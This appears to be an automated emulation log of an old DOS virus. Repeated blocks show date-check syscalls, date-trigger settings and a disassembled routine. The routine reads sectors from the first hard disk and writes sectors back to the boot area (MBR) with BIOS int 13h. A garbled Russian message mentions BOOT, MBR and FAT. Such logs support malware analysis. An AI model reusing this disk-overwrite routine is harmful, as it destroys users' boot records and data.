2018-12-25T12:05:16.035664836Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:05:16.040044676Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:05:19.216877008Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:05:19.555404746Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:05:19.560379298Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:05:22.268599274Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:05:23.374095442Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:05:23.376853536Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:05:28.685413284Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:05:29.327099092Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:05:29.329804624Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:05:28.821743573Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:05:29.327135538Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:05:29.329849973Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":1,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:05:32.717598389Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:05:33.042033084Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:05:33.04467273Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":1,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:05:33.740686093Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:05:34.073416291Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:05:34.076141619Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":1,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:10.366340422Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:10.390800447Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:10.395845555Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":1,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:10.577405789Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:10.604808151Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:10.610127656Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":1,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:10.780477283Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:11.116447033Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:11.122312337Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":1,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:10.992829117Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:11.117151235Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:11.122577054Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:11.183633079Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:11.25480382Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:11.260259407Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:11.510401627Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:11.594664271Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:11.604513118Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:11.581413603Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:11.722411526Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:11.727447182Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:11.793526348Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:11.896077035Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:11.901294664Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:12.006737638Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:12.112728719Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:12.118516191Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:12.204021571Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:12.469143095Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:12.474781674Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:12.415803428Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:13.078133175Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:13.083292263Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:12.615903839Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:12.854685879Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:12.859901878Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:12.817370922Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:12.852336705Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:12.858352109Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:07:14.267652509Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T13:07:14.607290243Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T13:07:14.612366805Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:13.231664224Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:13.247847826Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:13.256177552Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:13.450309369Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:13.459947922Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:13.463853832Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":1,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:13.64789753Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:13.663906067Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:13.668842267Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":1,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

